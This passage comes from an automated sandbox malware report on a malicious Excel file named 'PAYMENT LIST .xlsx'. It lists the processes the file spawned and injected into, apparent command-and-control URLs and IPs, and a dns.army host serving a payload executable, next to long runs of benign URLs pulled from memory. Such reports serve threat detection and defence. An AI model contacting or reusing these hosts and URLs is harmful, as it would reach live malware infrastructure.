          http://search.auction.co.kr/0%URL Reputationsafe
          http://search.auction.co.kr/0%URL Reputationsafe
          http://www.growingequity.fund/oean/?gnj80=CJBh7xO8zrtpcTq&jvylC6k0=VZAj6Greo+wzdRR3y+9BSoe0Fg1VHX3dphRjh8ChsM9cVC7/tTrq8181uuZfup+KvkP/wA==0%Avira URL Cloudsafe
          http://busca.buscape.com.br/favicon.ico0%URL Reputationsafe
          http://busca.buscape.com.br/favicon.ico0%URL Reputationsafe
          http://busca.buscape.com.br/favicon.ico0%URL Reputationsafe
          http://www.pchome.com.tw/favicon.ico0%URL Reputationsafe
          http://www.pchome.com.tw/favicon.ico0%URL Reputationsafe
          http://www.pchome.com.tw/favicon.ico0%URL Reputationsafe
          http://browse.guardian.co.uk/favicon.ico0%URL Reputationsafe
          http://browse.guardian.co.uk/favicon.ico0%URL Reputationsafe
          http://browse.guardian.co.uk/favicon.ico0%URL Reputationsafe
          http://google.pchome.com.tw/0%URL Reputationsafe
          http://google.pchome.com.tw/0%URL Reputationsafe
          http://google.pchome.com.tw/0%URL Reputationsafe
          http://www.ozu.es/favicon.ico0%Avira URL Cloudsafe
          http://search.yahoo.co.jp/favicon.ico0%URL Reputationsafe
          http://search.yahoo.co.jp/favicon.ico0%URL Reputationsafe
          http://search.yahoo.co.jp/favicon.ico0%URL Reputationsafe
          http://www.gmarket.co.kr/0%URL Reputationsafe
          http://www.gmarket.co.kr/0%URL Reputationsafe
          http://www.gmarket.co.kr/0%URL Reputationsafe
          http://searchresults.news.com.au/0%URL Reputationsafe
          http://searchresults.news.com.au/0%URL Reputationsafe
          http://searchresults.news.com.au/0%URL Reputationsafe
          http://www.asharqalawsat.com/0%URL Reputationsafe
          http://www.asharqalawsat.com/0%URL Reputationsafe
          http://www.asharqalawsat.com/0%URL Reputationsafe
          http://search.yahoo.co.jp0%URL Reputationsafe
          http://search.yahoo.co.jp0%URL Reputationsafe
          http://search.yahoo.co.jp0%URL Reputationsafe
          http://buscador.terra.es/0%URL Reputationsafe
          http://buscador.terra.es/0%URL Reputationsafe
          http://buscador.terra.es/0%URL Reputationsafe
          http://search.orange.co.uk/favicon.ico0%URL Reputationsafe
          http://search.orange.co.uk/favicon.ico0%URL Reputationsafe
          http://search.orange.co.uk/favicon.ico0%URL Reputationsafe
          http://www.iask.com/0%URL Reputationsafe
          http://www.iask.com/0%URL Reputationsafe
          http://www.iask.com/0%URL Reputationsafe
          http://cgi.search.biglobe.ne.jp/0%Avira URL Cloudsafe
          http://search.ipop.co.kr/favicon.ico0%URL Reputationsafe
          http://search.ipop.co.kr/favicon.ico0%URL Reputationsafe
          http://search.ipop.co.kr/favicon.ico0%URL Reputationsafe

          Domains and IPs

          Contacted Domains

          NameIPActiveMaliciousAntivirus DetectionReputation
          growingequity.fund
          34.102.136.180
          truetrue
            unknown
            kerifletcherrock.com
            34.102.136.180
            truetrue
              unknown
              kungsb2sndygotchtsnp.dns.army
              103.99.1.149
              truetrue
                unknown
                www.doxinlabs.com
                103.24.200.168
                truetrue
                  unknown
                  www.loimtech.com
                  106.14.46.68
                  truefalse
                    unknown
                    www.opmania36.com
                    156.240.35.23
                    truetrue
                      unknown
                      www.rentapalla.com
                      184.72.229.176
                      truetrue
                        unknown
                        www.kerifletcherrock.com
                        unknown
                        unknowntrue
                          unknown
                          www.growingequity.fund
                          unknown
                          unknowntrue
                            unknown

                            Contacted URLs

                            NameMaliciousAntivirus DetectionReputation
                            http://www.doxinlabs.com/oean/?jvylC6k0=0eja1hG/9tz86IL7VglQafiQyvHA2C4h7eUbaFgtY0eGgr750jLj1uDPdaibWffUDCzVWQ==&gnj80=CJBh7xO8zrtpcTqtrue
                            • Avira URL Cloud: safe
                            unknown
                            http://www.opmania36.com/oean/?jvylC6k0=f3eeGK1+0gCIvCWlFxxcFkAkVp6uwJz7C95spmYKsMNPFPV4KfhW/w3yTMrsoyUuOs+/YQ==&gnj80=CJBh7xO8zrtpcTqtrue
                            • Avira URL Cloud: safe
                            unknown
                            http://www.growingequity.fund/oean/?gnj80=CJBh7xO8zrtpcTq&jvylC6k0=VZAj6Greo+wzdRR3y+9BSoe0Fg1VHX3dphRjh8ChsM9cVC7/tTrq8181uuZfup+KvkP/wA==true
                            • Avira URL Cloud: safe
                            unknown

                            URLs from Memory and Binaries

                            NameSourceMaliciousAntivirus DetectionReputation
                            http://search.chol.com/favicon.icoexplorer.exe, 00000006.00000000.2191478810.000000000A3E9000.00000008.00000001.sdmpfalse
                              high
                              http://www.mercadolivre.com.br/explorer.exe, 00000006.00000000.2191478810.000000000A3E9000.00000008.00000001.sdmpfalse
                              • URL Reputation: safe
                              • URL Reputation: safe
                              • URL Reputation: safe
                              unknown
                              http://www.merlin.com.pl/favicon.icoexplorer.exe, 00000006.00000000.2191478810.000000000A3E9000.00000008.00000001.sdmpfalse
                              • URL Reputation: safe
                              • URL Reputation: safe
                              • URL Reputation: safe
                              unknown
                              http://search.ebay.de/explorer.exe, 00000006.00000000.2191478810.000000000A3E9000.00000008.00000001.sdmpfalse
                                high
                                http://www.mtv.com/explorer.exe, 00000006.00000000.2191478810.000000000A3E9000.00000008.00000001.sdmpfalse
                                  high
                                  http://www.rambler.ru/explorer.exe, 00000006.00000000.2191478810.000000000A3E9000.00000008.00000001.sdmpfalse
                                    high
                                    http://www.nifty.com/favicon.icoexplorer.exe, 00000006.00000000.2191478810.000000000A3E9000.00000008.00000001.sdmpfalse
                                      high
                                      http://www.dailymail.co.uk/explorer.exe, 00000006.00000000.2191478810.000000000A3E9000.00000008.00000001.sdmpfalse
                                      • URL Reputation: safe
                                      • URL Reputation: safe
                                      • URL Reputation: safe
                                      unknown
                                      http://www3.fnac.com/favicon.icoexplorer.exe, 00000006.00000000.2191478810.000000000A3E9000.00000008.00000001.sdmpfalse
                                        high
                                        http://buscar.ya.com/explorer.exe, 00000006.00000000.2191478810.000000000A3E9000.00000008.00000001.sdmpfalse
                                          high
                                          http://search.yahoo.com/favicon.icoexplorer.exe, 00000006.00000000.2191478810.000000000A3E9000.00000008.00000001.sdmpfalse
                                            high
                                            http://www.iis.fhg.de/audioPAexplorer.exe, 00000006.00000000.2182575060.0000000004B50000.00000002.00000001.sdmpfalse
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            unknown
                                            http://www.sogou.com/favicon.icoexplorer.exe, 00000006.00000000.2191478810.000000000A3E9000.00000008.00000001.sdmpfalse
                                              high
                                              http://asp.usatoday.com/explorer.exe, 00000006.00000000.2191478810.000000000A3E9000.00000008.00000001.sdmpfalse
                                                high
                                                https://simpletimelapse.sourceforge.io/update/version.txtwhttps://simpletimelapse.sourceforge.io/updvbc.exe, 00000004.00000000.2162721607.0000000001302000.00000020.00020000.sdmp, vbc.exe, 00000005.00000002.2224261783.0000000001302000.00000020.00020000.sdmp, msiexec.exe, 00000007.00000002.2379855432.0000000000610000.00000004.00000001.sdmpfalse
                                                  high
                                                  http://fr.search.yahoo.com/explorer.exe, 00000006.00000000.2191478810.000000000A3E9000.00000008.00000001.sdmpfalse
                                                    high
                                                    http://rover.ebay.comexplorer.exe, 00000006.00000000.2191478810.000000000A3E9000.00000008.00000001.sdmpfalse
                                                      high
                                                      http://in.search.yahoo.com/explorer.exe, 00000006.00000000.2191478810.000000000A3E9000.00000008.00000001.sdmpfalse
                                                        high
                                                        http://img.shopzilla.com/shopzilla/shopzilla.icoexplorer.exe, 00000006.00000000.2191478810.000000000A3E9000.00000008.00000001.sdmpfalse
                                                          high
                                                          http://search.ebay.in/explorer.exe, 00000006.00000000.2191478810.000000000A3E9000.00000008.00000001.sdmpfalse
                                                            high
                                                            http://image.excite.co.jp/jp/favicon/lep.icoexplorer.exe, 00000006.00000000.2191478810.000000000A3E9000.00000008.00000001.sdmpfalse
                                                            • URL Reputation: safe
                                                            • URL Reputation: safe
                                                            • URL Reputation: safe
                                                            unknown
                                                            http://%s.comexplorer.exe, 00000006.00000000.2191376130.000000000A330000.00000008.00000001.sdmpfalse
                                                            • URL Reputation: safe
                                                            • URL Reputation: safe
                                                            • URL Reputation: safe
                                                            low
                                                            http://msk.afisha.ru/explorer.exe, 00000006.00000000.2191478810.000000000A3E9000.00000008.00000001.sdmpfalse
                                                              high
                                                              http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namevbc.exe, 00000004.00000002.2168164981.00000000027C1000.00000004.00000001.sdmpfalse
                                                                high
                                                                http://busca.igbusca.com.br//app/static/images/favicon.icoexplorer.exe, 00000006.00000000.2191478810.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                unknown
                                                                http://search.rediff.com/explorer.exe, 00000006.00000000.2191478810.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                  high
                                                                  http://www.windows.com/pctv.explorer.exe, 00000006.00000000.2181421979.0000000003C40000.00000002.00000001.sdmpfalse
                                                                    high
                                                                    http://www.ya.com/favicon.icoexplorer.exe, 00000006.00000000.2191478810.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                      high
                                                                      http://www.etmall.com.tw/favicon.icoexplorer.exe, 00000006.00000000.2191478810.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                      • URL Reputation: safe
                                                                      • URL Reputation: safe
                                                                      • URL Reputation: safe
                                                                      unknown
                                                                      http://it.search.dada.net/favicon.icoexplorer.exe, 00000006.00000000.2191478810.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                      • URL Reputation: safe
                                                                      • URL Reputation: safe
                                                                      • URL Reputation: safe
                                                                      unknown
                                                                      http://search.naver.com/explorer.exe, 00000006.00000000.2191478810.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                        high
                                                                        http://www.google.ru/explorer.exe, 00000006.00000000.2191478810.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                          high
                                                                          http://search.hanafos.com/favicon.icoexplorer.exe, 00000006.00000000.2191478810.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                          • URL Reputation: safe
                                                                          • URL Reputation: safe
                                                                          • URL Reputation: safe
                                                                          unknown
                                                                          https://simpletimelapse.sourceforge.io/update/changelog.txtvbc.exefalse
                                                                            high
                                                                            http://cgi.search.biglobe.ne.jp/favicon.icoexplorer.exe, 00000006.00000000.2191478810.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                            • Avira URL Cloud: safe
                                                                            unknown
                                                                            http://www.abril.com.br/favicon.icoexplorer.exe, 00000006.00000000.2191478810.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                            • URL Reputation: safe
                                                                            • URL Reputation: safe
                                                                            • URL Reputation: safe
                                                                            unknown
                                                                            http://search.daum.net/explorer.exe, 00000006.00000000.2191478810.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                              high
                                                                              http://search.naver.com/favicon.icoexplorer.exe, 00000006.00000000.2191478810.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                high
                                                                                http://search.msn.co.jp/results.aspx?q=explorer.exe, 00000006.00000000.2191478810.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                • URL Reputation: safe
                                                                                • URL Reputation: safe
                                                                                • URL Reputation: safe
                                                                                unknown
                                                                                http://www.clarin.com/favicon.icoexplorer.exe, 00000006.00000000.2191478810.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                  high
                                                                                  http://buscar.ozu.es/explorer.exe, 00000006.00000000.2191478810.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                  • Avira URL Cloud: safe
                                                                                  unknown
                                                                                  http://kr.search.yahoo.com/explorer.exe, 00000006.00000000.2191478810.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                    high
                                                                                    http://search.about.com/explorer.exe, 00000006.00000000.2191478810.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                      high
                                                                                      http://busca.igbusca.com.br/explorer.exe, 00000006.00000000.2191478810.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                      • URL Reputation: safe
                                                                                      • URL Reputation: safe
                                                                                      • URL Reputation: safe
                                                                                      unknown
                                                                                      http://www.microsofttranslator.com/BVPrev.aspx?ref=IE8Activityexplorer.exe, 00000006.00000000.2191478810.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                        high
                                                                                        http://www.ask.com/explorer.exe, 00000006.00000000.2191478810.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                          high
                                                                                          http://www.priceminister.com/favicon.icoexplorer.exe, 00000006.00000000.2191478810.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                            high
                                                                                            http://www.cjmall.com/explorer.exe, 00000006.00000000.2191478810.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                              high
                                                                                              http://search.centrum.cz/explorer.exe, 00000006.00000000.2191478810.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                high
                                                                                                http://suche.t-online.de/explorer.exe, 00000006.00000000.2191478810.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                  high
                                                                                                  http://www.google.it/explorer.exe, 00000006.00000000.2191478810.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                    high
                                                                                                    http://search.auction.co.kr/explorer.exe, 00000006.00000000.2191478810.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                    • URL Reputation: safe
                                                                                                    • URL Reputation: safe
                                                                                                    • URL Reputation: safe
                                                                                                    unknown
                                                                                                    http://www.ceneo.pl/explorer.exe, 00000006.00000000.2191478810.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                      high
                                                                                                      http://www.amazon.de/explorer.exe, 00000006.00000000.2191478810.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                        high
                                                                                                        http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanervexplorer.exe, 00000006.00000000.2188725963.000000000861C000.00000004.00000001.sdmpfalse
                                                                                                          high
                                                                                                          http://sads.myspace.com/explorer.exe, 00000006.00000000.2191478810.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                            high
                                                                                                            http://busca.buscape.com.br/favicon.icoexplorer.exe, 00000006.00000000.2191478810.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                            • URL Reputation: safe
                                                                                                            • URL Reputation: safe
                                                                                                            • URL Reputation: safe
                                                                                                            unknown
                                                                                                            http://www.pchome.com.tw/favicon.icoexplorer.exe, 00000006.00000000.2191478810.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                            • URL Reputation: safe
                                                                                                            • URL Reputation: safe
                                                                                                            • URL Reputation: safe
                                                                                                            unknown
                                                                                                            http://browse.guardian.co.uk/favicon.icoexplorer.exe, 00000006.00000000.2191478810.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                            • URL Reputation: safe
                                                                                                            • URL Reputation: safe
                                                                                                            • URL Reputation: safe
                                                                                                            unknown
                                                                                                            http://google.pchome.com.tw/explorer.exe, 00000006.00000000.2191478810.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                            • URL Reputation: safe
                                                                                                            • URL Reputation: safe
                                                                                                            • URL Reputation: safe
                                                                                                            unknown
                                                                                                            http://list.taobao.com/browse/search_visual.htm?n=15&amp;q=explorer.exe, 00000006.00000000.2191478810.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                              high
                                                                                                              http://www.rambler.ru/favicon.icoexplorer.exe, 00000006.00000000.2191478810.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                high
                                                                                                                http://uk.search.yahoo.com/explorer.exe, 00000006.00000000.2191478810.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                  high
                                                                                                                  http://espanol.search.yahoo.com/explorer.exe, 00000006.00000000.2191478810.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                    high
                                                                                                                    http://www.ozu.es/favicon.icoexplorer.exe, 00000006.00000000.2191478810.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                    • Avira URL Cloud: safe
                                                                                                                    unknown
                                                                                                                    http://search.sify.com/explorer.exe, 00000006.00000000.2191478810.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                      high
                                                                                                                      http://openimage.interpark.com/interpark.icoexplorer.exe, 00000006.00000000.2191478810.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                        high
                                                                                                                        http://search.yahoo.co.jp/favicon.icoexplorer.exe, 00000006.00000000.2191478810.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                        • URL Reputation: safe
                                                                                                                        • URL Reputation: safe
                                                                                                                        • URL Reputation: safe
                                                                                                                        unknown
                                                                                                                        http://search.ebay.com/explorer.exe, 00000006.00000000.2191478810.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                          high
                                                                                                                          http://www.gmarket.co.kr/explorer.exe, 00000006.00000000.2191478810.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                          • URL Reputation: safe
                                                                                                                          • URL Reputation: safe
                                                                                                                          • URL Reputation: safe
                                                                                                                          unknown
                                                                                                                          http://search.nifty.com/explorer.exe, 00000006.00000000.2191478810.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                            high
                                                                                                                            http://searchresults.news.com.au/explorer.exe, 00000006.00000000.2191478810.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                            • URL Reputation: safe
                                                                                                                            • URL Reputation: safe
                                                                                                                            • URL Reputation: safe
                                                                                                                            unknown
                                                                                                                            http://www.google.si/explorer.exe, 00000006.00000000.2191478810.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                              high
                                                                                                                              http://www.google.cz/explorer.exe, 00000006.00000000.2191478810.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                high
                                                                                                                                http://www.soso.com/explorer.exe, 00000006.00000000.2191478810.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                  high
                                                                                                                                  http://www.univision.com/explorer.exe, 00000006.00000000.2191478810.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                    high
                                                                                                                                    http://search.ebay.it/explorer.exe, 00000006.00000000.2191478810.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                      high
                                                                                                                                      http://images.joins.com/ui_c/fvc_joins.icoexplorer.exe, 00000006.00000000.2191478810.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                        high
                                                                                                                                        http://www.asharqalawsat.com/explorer.exe, 00000006.00000000.2191478810.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                        • URL Reputation: safe
                                                                                                                                        • URL Reputation: safe
                                                                                                                                        • URL Reputation: safe
                                                                                                                                        unknown
                                                                                                                                        http://busca.orange.es/explorer.exe, 00000006.00000000.2191478810.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                          high
                                                                                                                                          http://cnweb.search.live.com/results.aspx?q=explorer.exe, 00000006.00000000.2191478810.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                            high
                                                                                                                                            http://auto.search.msn.com/response.asp?MT=explorer.exe, 00000006.00000000.2191376130.000000000A330000.00000008.00000001.sdmpfalse
                                                                                                                                              high
                                                                                                                                              http://search.yahoo.co.jpexplorer.exe, 00000006.00000000.2191478810.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                              • URL Reputation: safe
                                                                                                                                              • URL Reputation: safe
                                                                                                                                              • URL Reputation: safe
                                                                                                                                              unknown
                                                                                                                                              http://www.target.com/explorer.exe, 00000006.00000000.2191478810.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                                high
                                                                                                                                                http://buscador.terra.es/explorer.exe, 00000006.00000000.2191478810.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                                • URL Reputation: safe
                                                                                                                                                • URL Reputation: safe
                                                                                                                                                • URL Reputation: safe
                                                                                                                                                unknown
                                                                                                                                                http://search.orange.co.uk/favicon.icoexplorer.exe, 00000006.00000000.2191478810.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                                • URL Reputation: safe
                                                                                                                                                • URL Reputation: safe
                                                                                                                                                • URL Reputation: safe
                                                                                                                                                unknown
                                                                                                                                                http://www.iask.com/explorer.exe, 00000006.00000000.2191478810.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                                • URL Reputation: safe
                                                                                                                                                • URL Reputation: safe
                                                                                                                                                • URL Reputation: safe
                                                                                                                                                unknown
                                                                                                                                                http://www.tesco.com/explorer.exe, 00000006.00000000.2191478810.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                                  high
                                                                                                                                                  http://cgi.search.biglobe.ne.jp/explorer.exe, 00000006.00000000.2191478810.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                                  • Avira URL Cloud: safe
                                                                                                                                                  unknown
                                                                                                                                                  http://search.seznam.cz/favicon.icoexplorer.exe, 00000006.00000000.2191478810.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                                    high
                                                                                                                                                    http://suche.freenet.de/favicon.icoexplorer.exe, 00000006.00000000.2191478810.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                                      high
                                                                                                                                                      http://search.interpark.com/explorer.exe, 00000006.00000000.2191478810.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                                        high
                                                                                                                                                        http://search.ipop.co.kr/favicon.icoexplorer.exe, 00000006.00000000.2191478810.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                                        • URL Reputation: safe
                                                                                                                                                        • URL Reputation: safe
                                                                                                                                                        • URL Reputation: safe
                                                                                                                                                        unknown
                                                                                                                                                        http://investor.msn.com/explorer.exe, 00000006.00000000.2181421979.0000000003C40000.00000002.00000001.sdmpfalse
                                                                                                                                                          high
                                                                                                                                                          http://search.espn.go.com/explorer.exe, 00000006.00000000.2191478810.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                                            high
                                                                                                                                                            http://www.myspace.com/favicon.icoexplorer.exe, 00000006.00000000.2191478810.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                                              high
                                                                                                                                                              http://search.centrum.cz/favicon.icoexplorer.exe, 00000006.00000000.2191478810.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                                                high

                                                                                                                                                                Contacted IPs

                                                                                                                                                                • No. of IPs < 25%
                                                                                                                                                                • 25% < No. of IPs < 50%
                                                                                                                                                                • 50% < No. of IPs < 75%
                                                                                                                                                                • 75% < No. of IPs

                                                                                                                                                                Public

                                                                                                                                                                IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                                184.72.229.176
                                                                                                                                                                unknownUnited States
                                                                                                                                                                14618AMAZON-AESUStrue
                                                                                                                                                                156.240.35.23
                                                                                                                                                                unknownSeychelles
                                                                                                                                                                328608Africa-on-Cloud-ASZAtrue
                                                                                                                                                                103.99.1.149
                                                                                                                                                                unknownViet Nam
                                                                                                                                                                135905VNPT-AS-VNVIETNAMPOSTSANDTELECOMMUNICATIONSGROUPVNtrue
                                                                                                                                                                34.102.136.180
                                                                                                                                                                unknownUnited States
                                                                                                                                                                15169GOOGLEUStrue
                                                                                                                                                                103.24.200.168
                                                                                                                                                                unknownIndia
                                                                                                                                                                58909ISSPL-INIBEESoftwareSolutionsPvtLtdINtrue

                                                                                                                                                                General Information

                                                                                                                                                                Joe Sandbox Version:31.0.0 Emerald
                                                                                                                                                                Analysis ID:344799
                                                                                                                                                                Start date:27.01.2021
                                                                                                                                                                Start time:07:18:48
                                                                                                                                                                Joe Sandbox Product:CloudBasic
                                                                                                                                                                Overall analysis duration:0h 10m 32s
                                                                                                                                                                Hypervisor based Inspection enabled:false
                                                                                                                                                                Report type:light
                                                                                                                                                                Sample file name:PAYMENT LIST .xlsx
                                                                                                                                                                Cookbook file name:defaultwindowsofficecookbook.jbs
                                                                                                                                                                Analysis system description:Windows 7 x64 SP1 with Office 2010 SP2 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
                                                                                                                                                                Number of analysed new started processes analysed:9
                                                                                                                                                                Number of new started drivers analysed:0
                                                                                                                                                                Number of existing processes analysed:0
                                                                                                                                                                Number of existing drivers analysed:0
                                                                                                                                                                Number of injected processes analysed:1
                                                                                                                                                                Technologies:
                                                                                                                                                                • HCA enabled
                                                                                                                                                                • EGA enabled
                                                                                                                                                                • HDC enabled
                                                                                                                                                                • AMSI enabled
                                                                                                                                                                Analysis Mode:default
                                                                                                                                                                Analysis stop reason:Timeout
                                                                                                                                                                Detection:MAL
                                                                                                                                                                Classification:mal100.troj.expl.evad.winXLSX@10/6@8/5
                                                                                                                                                                EGA Information:Failed
                                                                                                                                                                HDC Information:
                                                                                                                                                                • Successful, ratio: 19.1% (good quality ratio 18.2%)
                                                                                                                                                                • Quality average: 71.8%
                                                                                                                                                                • Quality standard deviation: 28.7%
                                                                                                                                                                HCA Information:
                                                                                                                                                                • Successful, ratio: 96%
                                                                                                                                                                • Number of executed functions: 0
                                                                                                                                                                • Number of non-executed functions: 0
                                                                                                                                                                Cookbook Comments:
                                                                                                                                                                • Adjust boot time
                                                                                                                                                                • Enable AMSI
                                                                                                                                                                • Found application associated with file extension: .xlsx
                                                                                                                                                                • Found Word or Excel or PowerPoint or XPS Viewer
                                                                                                                                                                • Attach to Office via COM
                                                                                                                                                                • Scroll down
                                                                                                                                                                • Close Viewer
                                                                                                                                                                Warnings:
                                                                                                                                                                Show All
                                                                                                                                                                • Exclude process from analysis (whitelisted): dllhost.exe, conhost.exe
                                                                                                                                                                • TCP Packets have been reduced to 100
                                                                                                                                                                • VT rate limit hit for: /opt/package/joesandbox/database/analysis/344799/sample/PAYMENT LIST .xlsx

                                                                                                                                                                Simulations

                                                                                                                                                                Behavior and APIs

                                                                                                                                                                TimeTypeDescription
                                                                                                                                                                07:20:12API Interceptor79x Sleep call for process: EQNEDT32.EXE modified
                                                                                                                                                                07:20:16API Interceptor130x Sleep call for process: vbc.exe modified
                                                                                                                                                                07:20:44API Interceptor230x Sleep call for process: msiexec.exe modified
                                                                                                                                                                07:21:22API Interceptor1x Sleep call for process: explorer.exe modified

                                                                                                                                                                Joe Sandbox View / Context

                                                                                                                                                                IPs

                                                                                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                                                184.72.229.176e0ciSGkcJn.exeGet hashmaliciousBrowse
                                                                                                                                                                • www.rentapalla.com/oean/?E61l=uJMS4n8j6HCogiCaEpEiAtJtgQ+Goi3J4PFZtpc0eYiAEE1EMdJ7DNh2J2XZm7o4eqi0&nPntH8=dXbHpDFHFzJx
                                                                                                                                                                4wCFJMHdEJ.exeGet hashmaliciousBrowse
                                                                                                                                                                • www.rentapalla.com/oean/?lTB=uJMS4n8j6HCogiCaEpEiAtJtgQ+Goi3J4PFZtpc0eYiAEE1EMdJ7DNh2J2XZm7o4eqi0&Bvg=yL0LRZtXKrL
                                                                                                                                                                http://mobwatch.co.za/Bull-Horns-Woza.phpGet hashmaliciousBrowse
                                                                                                                                                                • mobwatch.co.za/APPLY.php
                                                                                                                                                                103.99.1.149NEW ORDER.xlsxGet hashmaliciousBrowse
                                                                                                                                                                • wsdykungsb2gotchtsub.dns.army/kung2doc/winlog.exe
                                                                                                                                                                MV CORESHIP.xlsxGet hashmaliciousBrowse
                                                                                                                                                                • wsdykungsb2gotchtsub.dns.army/kung2doc/winlog.exe
                                                                                                                                                                34.102.136.180quote20210126.exe.exeGet hashmaliciousBrowse
                                                                                                                                                                • www.ribbonredwhiteandblue.com/dei5/?TZkpkdJ=g0K5ifwFWV09n7i1NEiFZbu/6tutLBAV6sI0nEyaQ7OZPYqcNrOHgfWcWl8srePs8/mI&U4kp=NtxLpLUP-vTH68s
                                                                                                                                                                SecuriteInfo.com.Trojan.Packed2.42783.14936.exeGet hashmaliciousBrowse
                                                                                                                                                                • www.edu4go.com/bsl/?mt=meRO04KZ+tRueejEQ1mKApUC+xiZQAGZPTeO6WstMPZoEBgumINoRWRpGBFK3WkMjtLu&2d=hxlpdRkxCvtTgBzP
                                                                                                                                                                PAYMENT.260121.xlsxGet hashmaliciousBrowse
                                                                                                                                                                • www.worldwide-mt.com/kzd/
                                                                                                                                                                bXFjrxjRlb.exeGet hashmaliciousBrowse
                                                                                                                                                                • www.what3emoji.com/bf3/?pPX=m4Qmgz02ndzlkmzRdXbnUnIUoJvahqq5/3ILTCGwMTubC4gHDN74yJVcJDUGCd+LoHuKsTQ0JA==&W6=jnKpRl-xV
                                                                                                                                                                xl2Ml2iNJe.exeGet hashmaliciousBrowse
                                                                                                                                                                • www.ricardoinman.com/xle/?-ZnD=LjoXU6n8-&iBrlPD=43tORsMo6Gry83Td78nIWgxEplzIHXHZqBl7iQpQA31ZPQcRtwVYWDcsKQV/txd+LHV0DSgDXQ==
                                                                                                                                                                v07PSzmSp9.exeGet hashmaliciousBrowse
                                                                                                                                                                • www.jikzo.com/c8so/?3ff87=Bcwq9mo1SLdxGMzaDRBSbVH3gidTK8xbNEF8M/tGLQ2aKWcuDQCQFtxR7k1oF3yRZXKc&uZWD=XPmPajepJ2gdvnZ
                                                                                                                                                                NEW ORDER.xlsxGet hashmaliciousBrowse
                                                                                                                                                                • www.simplifiedvirtualsolutions.com/oean/?MdLxlt=mKgmb7I6yODGcWmnOnDfCd0CfDEQGPBdVeZhKsaKMoR3Qh4v4CLN6oxN3p9trG3799qCow==&gnU4Pf=yZPLGZXHl
                                                                                                                                                                Inquiry_73834168_.xlsxGet hashmaliciousBrowse
                                                                                                                                                                • www.kaiyuansu.pro/incn/?9r_PU=-ZQLEn&e2Jdlzf8=4y+UTKzAJ4dBlp/RYYS74WaP+qCjnKVRzK/jF/x906cXBmLcUo8gxmNUvdqUiR1QG2msPA==
                                                                                                                                                                winlog(1).exeGet hashmaliciousBrowse
